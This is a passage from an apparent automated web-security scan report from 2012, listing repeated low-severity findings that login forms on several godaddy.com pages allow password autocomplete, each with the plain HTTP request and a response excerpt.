Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/web-hosting.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=smfbfos&shopper=&privatelabelid=1&isc=smfbfos&clientip=174.36.218.2&referringpath=&referringdomain=&split=41; domain=godaddy.com; path=/
Set-Cookie: BlueLithium=khfhdfrjhhngmbhdcghhojfgnawenaeh; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:49 GMT
Connection: close
Content-Length: 222155


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=smfbfos&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.45. http://www.godaddy.com/hosting/web-hosting.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/web-hosting.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hosting/web-hosting.aspx?isc=GPPT03C006&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=dc04ocrggipjsmnvlkcnp0d5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=dc04ocrggipjsmnvlkcnp0d5; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:00 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:00 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:00 GMT; path=/
Set-Cookie: SplitValue1=77; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:00 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/web-hosting.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=GPPT03C006&domain=edhardy.com&shopper=&privatelabelid=1&isc=GPPT03C006&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=77; domain=godaddy.com; path=/
Set-Cookie: BlueLithium=whyfkflaaclcqfgeoeegrfniddoikfsi; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:59 GMT
Connection: close
Content-Length: 222866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=GPPT03C006&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.46. http://www.godaddy.com/hosting/web-hosting.aspx/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/web-hosting.aspx/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hosting/web-hosting.aspx/ HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=y0leoaykjvaj1yv0kg1cuafj; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=y0leoaykjvaj1yv0kg1cuafj; path=/; HttpOnly
Set-Cookie: SplitValue1=24; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:07 GMT; path=/
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:07 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:07 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:07 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/web-hosting.aspx/&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=24; domain=godaddy.com; path=/
Set-Cookie: BlueLithium=ahwhfdcfajkbqajjscfeahqimfpfdhcg; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:07 GMT
Connection: close
Content-Length: 213915


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.47. http://www.godaddy.com/hosting/web-hosting.aspx/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/web-hosting.aspx/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hosting/web-hosting.aspx/?isc=smtwfos HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xfdgzzntfwzqmzz1mzbb2s00; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xfdgzzntfwzqmzz1mzbb2s00; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:08 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:08 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:08 GMT; path=/
Set-Cookie: SplitValue1=94; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:08 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/web-hosting.aspx/&server=M1PWCORPWEB137&status=200 OK&querystring=isc=smtwfos&shopper=&privatelabelid=1&isc=smtwfos&clientip=174.36.218.2&referringpath=&referringdomain=&split=94; domain=godaddy.com; path=/
Set-Cookie: BlueLithium=tilckhmaggpedatdidijogpgaisdtajj; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:08 GMT
Connection: close
Content-Length: 222158


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=smtwfos&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.48. http://www.godaddy.com/hosting/website-builder.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/website-builder.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hosting/website-builder.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=5jg3h32madmr4zsz35egpekd; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=5jg3h32madmr4zsz35egpekd; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:53 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:53 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:53 GMT; path=/
Set-Cookie: SplitValue1=67; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:53 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=67; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:52 GMT
Connection: close
Content-Length: 139000


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.49. http://www.godaddy.com/hosting/website-builder.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/website-builder.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hosting/website-builder.aspx?isc=gppt02C011&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=rtz0d0featnzolww4ct0tn5u; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=rtz0d0featnzolww4ct0tn5u; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:53 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:53 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:53 GMT; path=/
Set-Cookie: SplitValue1=87; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:53 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=gppt02C011&domain=edhardy.com&shopper=&privatelabelid=1&isc=gppt02C011&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=87; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:53 GMT
Connection: close
Content-Length: 142042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=gppt02C011&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.50. http://www.godaddy.com/hosting/website-builder.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/website-builder.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hosting/website-builder.aspx?isc=smtwfos HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=u2la4zmmsfpk5ppxro0qweir; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=u2la4zmmsfpk5ppxro0qweir; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:48 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:48 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:48 GMT; path=/
Set-Cookie: SplitValue1=24; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:48 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=smtwfos&shopper=&privatelabelid=1&isc=smtwfos&clientip=174.36.218.2&referringpath=&referringdomain=&split=24; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:48 GMT
Connection: close
Content-Length: 141502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=smtwfos&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.51. http://www.godaddy.com/hosting/website-builder.aspx/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/website-builder.aspx/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hosting/website-builder.aspx/ HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=jm3y5okwp1jwrxgxuokpylo4; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=jm3y5okwp1jwrxgxuokpylo4; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:10 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:10 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:10 GMT; path=/
Set-Cookie: SplitValue1=16; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:10 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx/&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=16; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:09 GMT
Connection: close
Content-Length: 139003


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.52. http://www.godaddy.com/hosting/website-builder.aspx/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/website-builder.aspx/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hosting/website-builder.aspx/?isc=smtwfos HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vlqnp0o1ra2qdssiunll34dc; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vlqnp0o1ra2qdssiunll34dc; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:10 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:10 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:10 GMT; path=/
Set-Cookie: SplitValue1=82; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:10 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx/&server=M1PWCORPWEB137&status=200 OK&querystring=isc=smtwfos&shopper=&privatelabelid=1&isc=smtwfos&clientip=174.36.218.2&referringpath=&referringdomain=&split=82; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:10 GMT
Connection: close
Content-Length: 141506


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=smtwfos&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.53. http://www.godaddy.com/icann/domain_search.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /icann/domain_search.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /icann/domain_search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2gelekbswxnboi2nl0fbusne; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2gelekbswxnboi2nl0fbusne; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:59 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:59 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:59 GMT; path=/
Set-Cookie: SplitValue1=79; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:59 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/icann/domain_search.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=79; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:59 GMT
Connection: close
Content-Length: 89453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.54. http://www.godaddy.com/jobs/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /jobs/default.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jobs/default.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xs3u32cf4rn3keo224ona3hd; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xs3u32cf4rn3keo224ona3hd; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:31 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:31 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:31 GMT; path=/
Set-Cookie: SplitValue1=83; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:31 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/jobs/default.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=83; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:31 GMT
Connection: close
Content-Length: 84117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.55. http://www.godaddy.com/legal-agreements.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /legal-agreements.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /legal-agreements.aspx?ci=46445&otab=2 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=pws21k1bibw4bdrfmld21x3a; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=pws21k1bibw4bdrfmld21x3a; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:07 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:07 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:07 GMT; path=/
Set-Cookie: SplitValue1=68; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:07 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/legal-agreements.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=46445&otab=2&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:06 GMT
Connection: close
Content-Length: 181562


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.56. http://www.godaddy.com/offers/hot-deals2.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /offers/hot-deals2.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /offers/hot-deals2.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

